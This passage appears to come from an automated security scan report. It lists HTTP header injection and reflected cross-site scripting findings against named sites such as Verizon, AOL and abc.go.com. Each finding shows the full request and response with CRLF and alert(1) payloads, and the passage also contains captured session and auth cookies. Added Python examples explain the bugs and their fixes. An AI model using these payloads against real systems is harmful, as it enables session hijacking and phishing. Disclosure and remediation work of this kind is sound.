Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/65bc6
7e707f3a9da
/N2870.vznbiz/B3160296%3Bsz%3D300x300%3Bord%3D2139185137:
Date: Sun, 21 Nov 2010 22:29:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://vulnerable.verizon.host/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ae7c8%0d%0a3218649ce4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifae7c8%0d%0a3218649ce4b?1290207264971902 HTTP/1.1
Accept: */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifae7c8
3218649ce4b
:
Date: Fri, 19 Nov 2010 22:57:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://amch.questionmarket.com/adscgen/st.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload b8b0f%0d%0a3bcadb1b34c was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=725650&site=48495972&code=39005743&randnum=4312221 HTTP/1.1
Accept: */*
Referer: http://www.yelp.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: amch.questionmarket.com
Proxy-Connection: Keep-Alive
Cookie: CS1=39341243-52-1; ES=b8b0f%0d%0a3bcadb1b34c

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:43:44 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Fri, 20-Nov-2009 03:43:43 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=39341243-52-1_725650-1-1; expires=Tue, 10-Jan-2012 19:43:44 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=b8b0f
3bcadb1b34c
_725650-8zSjM-0; expires=Tue, 10-Jan-2012 19:43:44 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=725650&site=5-48495972-&code=39005743
Content-Length: 0
Content-Type: text/html


1.6. http://amch.questionmarket.com/adscgen/st.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 32c9e%0d%0a01ddaa8666 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=725650&site=48495972&code=32c9e%0d%0a01ddaa8666&randnum=4312221 HTTP/1.1
Accept: */*
Referer: http://www.yelp.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: amch.questionmarket.com
Proxy-Connection: Keep-Alive
Cookie: CS1=39341243-52-1; ES=818078-\BGjM-0

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:43:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Fri, 20-Nov-2009 03:43:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=39341243-52-1_725650-1-1; expires=Tue, 10-Jan-2012 19:43:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=818078-\BGjM-0_725650-1zSjM-0; expires=Tue, 10-Jan-2012 19:43:37 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=725650&site=5-48495972-&code=32c9e
01ddaa8666

Content-Length: 0
Content-Type: text/html


1.7. http://amch.questionmarket.com/adscgen/st.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload dc9f3%0d%0a23628b7f9c8 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=725650&site=dc9f3%0d%0a23628b7f9c8&code=39005743&randnum=4312221 HTTP/1.1
Accept: */*
Referer: http://www.yelp.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: amch.questionmarket.com
Proxy-Connection: Keep-Alive
Cookie: CS1=39341243-52-1; ES=818078-\BGjM-0

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:43:35 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Fri, 20-Nov-2009 03:43:34 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=39341243-52-1_725650-1-1; expires=Tue, 10-Jan-2012 19:43:35 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=818078-\BGjM-0_725650-~ySjM-0; expires=Tue, 10-Jan-2012 19:43:35 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=725650&site=-1-dc9f3
23628b7f9c8
-&code=39005743
Content-Length: 0
Content-Type: text/html


1.8. http://anrtx.tacoda.net/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://anrtx.tacoda.net
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 1b57e%0d%0a47dfc6b5cfd was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js HTTP/1.1
Host: anrtx.tacoda.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TID=16e8oqe01cg8de; Anxd=x; N=2:fd178a2029727e2044734a1f872c09cd,fd178a2029727e2044734a1f872c09cd1b57e%0d%0a47dfc6b5cfd; TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; Tsid=0^1290207076^1290208930|16728^1290207076^1290208930|18251^1290207125^1290208925; ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925;

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:45:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 20 Nov 2010 00:00:29 GMT
Set-Cookie: ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925; path=/; expires=Fri, 26-Nov-10 23:45:29 GMT; domain=.tacoda.net
Set-Cookie: Tsid=; path=/; expires=Thu, 19-Nov-09 23:45:29 GMT; domain=.tacoda.net
Set-Cookie: TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net
Set-Cookie: Anxd=x; expires=Sat, 20-Nov-10 05:45:29 GMT; path=/; domain=.tacoda.net
Set-Cookie: N=2:fd178a2029727e2044734a1f872c09cd1b57e
47dfc6b5cfd
,fd178a2029727e2044734a1f872c09cd; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net
Content-Length: 90
Keep-Alive: timeout=60, max=965
Connection: Keep-Alive
Content-Type: application/x-javascript

var ANUT=1;
var ANOO=0;
var ANSR=0;
var ANTID='16e8oqe01cg8de';
var ANSL;
ANRTXR();

1.9. http://anrtx.tacoda.net/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://anrtx.tacoda.net
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 2317e%0d%0a6638b1327e8 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=2317e%0d%0a6638b1327e8&pi=L&xs=1&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%2526ifu%253Dhttp%25253A//www.aolnews.com/&r=&v=5.2&cb=15132 HTTP/1.1
Accept: */*
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: anrtx.tacoda.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: TID=16e8oqe01cg8de; ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290809426; TData=99999|^|50085|54057|60490|#|50212|50220|60183; Anxd=x; N=2:2d4b241376080b3f4b97b4a5119bd63d,35e011dd6654f3998e5f304b452ffa3c

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:45:58 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 20 Nov 2010 00:00:58 GMT
Set-Cookie: ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290815158; path=/; expires=Fri, 26-Nov-10 23:45:58 GMT; domain=.tacoda.net
Set-Cookie: Tsid=0^1290210358^1290212158|2317e
6638b1327e8
^1290210358^1290212158; path=/; expires=Sat, 20-Nov-10 00:15:58 GMT; domain=.tacoda.net
Set-Cookie: TData=99999|^|50085|54057|60490|#|50212|50220|60183; expires=Mon, 14-Nov-11 23:45:58 GMT; path=/; domain=.tacoda.net
Set-Cookie: Anxd=x; expires=Sat, 20-Nov-10 05:45:58 GMT; path=/; domain=.tacoda.net
Set-Cookie: N=2:35e011dd6654f3998e5f304b452ffa3c,35e011dd6654f3998e5f304b452ffa3c; expires=Mon, 14-Nov-11 23:45:58 GMT; path=/; domain=.tacoda.net
Content-Length: 90
Content-Type: application/x-javascript

var ANUT=1;
var ANOO=0;
var ANSR=0;
var ANTID='16e8oqe01cg8de';
var ANSL;
ANRTXR();

1.10. https://auth.verizon.com/amserver/UI/Login [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into the Location response header. The payload 468b3%0d%0ae6a869cb573 was submitted in the goto parameter. This caused a response containing an injected HTTP header.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=468b3%0d%0ae6a869cb573 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 02:15:45 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=468b3
e6a869cb573

Set-cookie: JSESSIONID=551CF2532820EFDFFF319A43015D9990;Path=/
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcyLSw2AprZCxoQFFnJupN9A%2FsDZ3JgYIpY%3D%40AAJTSQACNjkAAlMxAAIwMw%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=03;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close


1.11. https://auth.verizon.net/amserver/UI/Login [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.net
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into the Location response header. The payload 794ac%0d%0a4d3881665ea was submitted in the goto parameter. This caused a response containing an injected HTTP header.

Request

GET /amserver/UI/Login?realm=dotnet&module=AIAWN&goto=794ac%0d%0a4d3881665ea HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=webmail; JSESSIONID=2D7E445097FDA183EEB1FF24695BC505; amlbcookie=02; AMAuthCookie=LOGOUT; POPRefid=refid=&refresh=y&reftrytime=0&refnum=;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 03:43:13 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLogin794ac
4d3881665ea

Set-cookie: JSESSIONID=D27C25CA2B136908BF4CEE59B12E3BAC;Path=/
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcwJNpIDBK%2BVlDyOb6NjEFv7sWCn5SRgPkk%3D%40AAJTSQACMzAAAlMxAAIwMg%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=02;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close

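The two findings above (1.10 and 1.11) share one root cause: the server URL-decodes the goto parameter, so %0d%0a arrives as a real CR LF, and the application then concatenates that value into the Location header unchecked. The following is an added example, not code from the report or from the scanned hosts. It rebuilds that handler in miniature beside a hardened one and includes a small header parser so the effect can be checked the way a client would see it. The base URL is the one from 1.10; the function names and the Set-Cookie payload are constructed for the example.

```python
from urllib.parse import quote

# Base redirect target taken from finding 1.10; everything else here is constructed.
BASE = "https://www22.verizon.com/myverizon/?session=n&goto="


def redirect_vulnerable(goto: str) -> bytes:
    """Mirrors the report: the (already URL-decoded) goto value is concatenated
    into the header block verbatim, so a CR LF inside it terminates the Location
    header and whatever follows is parsed as a new header line."""
    head = ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: " + BASE + goto + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")
    return head.encode("latin-1")


def redirect_safe(goto: str) -> bytes:
    """Two independent controls: refuse header-breaking characters outright, and
    percent-encode the value so it can only ever be one query-string value
    (this also stops '&' or '#' in goto from rewriting the rest of the URL)."""
    if any(c in goto for c in "\r\n\x00"):
        raise ValueError("control character in goto")
    head = ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: " + BASE + quote(goto, safe="") + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")
    return head.encode("latin-1")


def parse_headers(raw: bytes) -> dict:
    """Header block as a simple client tokenises it (last duplicate wins)."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def injected_headers(goto: str) -> set:
    """Header names present in the vulnerable response that the handler never
    set. A non-empty set means the parameter broke out of the Location header."""
    expected = {"location", "content-length"}
    return set(parse_headers(redirect_vulnerable(goto))) - expected


if __name__ == "__main__":
    # The scanner's own probe: the text after CR LF becomes a header line.
    print(injected_headers("468b3\r\ne6a869cb573"))
    # Constructed payload showing why this is rated High: an attacker-chosen header.
    print(injected_headers("468b3\r\nSet-Cookie: injected=1"))
    print(parse_headers(redirect_safe("x&y=1"))["location"])
```

The check to add to a regression suite is the one injected_headers performs: any header name in the response that the code path did not set is a failure, regardless of what the injected line says.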

2. Cross-site scripting (reflected)
There are 997 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses.

First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

Second, user input should be encoded for the context into which it is copied at the point where it is written into the response. In an HTML body or attribute this means replacing all HTML metacharacters, including < > " ' and =, with the corresponding HTML entities (&lt; &gt; etc). Inside a script block, where most of the findings below occur, HTML entities are not decoded by the browser, so the value must instead be escaped as a JavaScript string (for example with \uXXXX sequences).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
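Nearly every finding in this section (2.1, 2.2 to 2.6, 2.7, 2.9, 2.10, 2.11) is the same pattern: a value lands inside a quoted JavaScript string literal and the quote character is not escaped. The block below is an added example, not code from the report or the affected sites. It renders the scanner's actual payloads through three encoders into an assignment of the shape the about.aol.com pages emit (s_265.prop1="..."), then uses a tiny JavaScript string-literal lexer to decide whether the literal closes before the template's own closing quote, which is exactly the condition the scanner reports as "terminate the JavaScript string". The encoder and helper names are this example's own.

```python
import html

# Escape every character that can end a JS string literal, start a tag or
# comment, or break the line, as a \uXXXX sequence. Includes U+2028/U+2029,
# which are line terminators in JavaScript but not in JSON-style encoders.
JS_ESCAPE = {c: "\\u%04x" % ord(c) for c in "\"'\\<>&/=\u2028\u2029\r\n"}


def identity(value: str) -> str:
    """What the scanned pages did: copy the value unchanged."""
    return value


def html_entities_only(value: str) -> str:
    """The common 'HTML-encode' that only handles & < > and leaves quotes alone.
    Inside <script> this is the wrong layer and does not stop the break-out."""
    return html.escape(value, quote=False)


def js_string_escape(value: str) -> str:
    """Correct encoder for a quoted JS string context."""
    return "".join(JS_ESCAPE.get(c, c) for c in value)


def render_assignment(value: str, encoder, quote: str = '"') -> str:
    """s_265.prop1="VALUE"; as emitted by the about.aol.com 404 pages (2.2-2.5)."""
    return "s_265.prop1=" + quote + encoder(value) + quote + ";"


def string_literal_end(js: str, start: int) -> int:
    """Index just past the closing quote of the literal opening at `start`,
    following the JS lexer rules: a backslash consumes the next character and a
    raw line terminator makes the literal unterminated (-1)."""
    quote = js[start]
    i = start + 1
    while i < len(js):
        c = js[i]
        if c == "\\":
            i += 2
            continue
        if c == quote:
            return i + 1
        if c in "\r\n\u2028\u2029":
            return -1
        i += 1
    return -1


def escapes_literal(value: str, encoder, quote: str = '"') -> bool:
    """True when the encoded value lets the lexer close (or break) the literal
    before the template's own closing quote, i.e. the injection succeeded."""
    js = render_assignment(value, encoder, quote)
    end = string_literal_end(js, js.index(quote))
    return end != len(js) - 1  # the template's closing quote sits just before ';'


if __name__ == "__main__":
    dq = '80597";alert(1)//8ad75bcf9ec'          # payload from 2.1
    sq = "69d29'-alert(1)-'825c464d51d"          # payload from 2.9
    for name, enc in (("identity", identity),
                      ("html_entities_only", html_entities_only),
                      ("js_string_escape", js_string_escape)):
        print(name, escapes_literal(dq, enc), escapes_literal(sq, enc, "'"))
```

Full HTML entity encoding (html.escape with quote=True) would also keep the literal intact, but only by accident: script text is not entity-decoded, so the application would read a corrupted value containing &quot;. The context-specific encoder is the fix, applied at the point of output rather than as input sanitisation.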


2.1. http://abc.go.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80597"%3balert(1)//8ad75bcf9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80597";alert(1)//8ad75bcf9ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?80597"%3balert(1)//8ad75bcf9ec=1 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 97885
Content-Type: text/html; charset=UTF-8
Last-Modified: Fri, 19 Nov 2010 23:38:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Set-Cookie: SWID=FE2AB8A7-AB90-4FDD-9541-F9BB3ED0890A; path=/; expires=Fri, 19-Nov-2030 23:38:22 GMT; domain=.go.com;
Cache-Expires: Fri, 19 Nov 2010 23:53:22 GMT
Date: Fri, 19 Nov 2010 23:38:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/schem
...[SNIP]...
bc.csar.go.com/DynamicCSAd?srvc=abc&itype=ThinBanner&itype=Rectangles&itype=Background&itype=LRGutters&itype=PopUnder&itype=Survey&itype=FPBranding&itype=Banner-Unicast&itype=RevenueScience&url=/index?80597";alert(1)//8ad75bcf9ec=1"; var paramD = "&"; var regexS = "[\?&]test=([^&#]*)"; var regex = new RegExp( regexS ); var resultsT = regex.exec( window.location.href ); if(resultsT != null) csarUrl += paramD + "test="+ resul
...[SNIP]...

2.2. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bfc"%3bc758afbe8ca was submitted in the REST URL parameter 1. This input was echoed as d9bfc";c758afbe8ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkd9bfc"%3bc758afbe8ca/aol_pp HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.592896; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:35 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10535
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
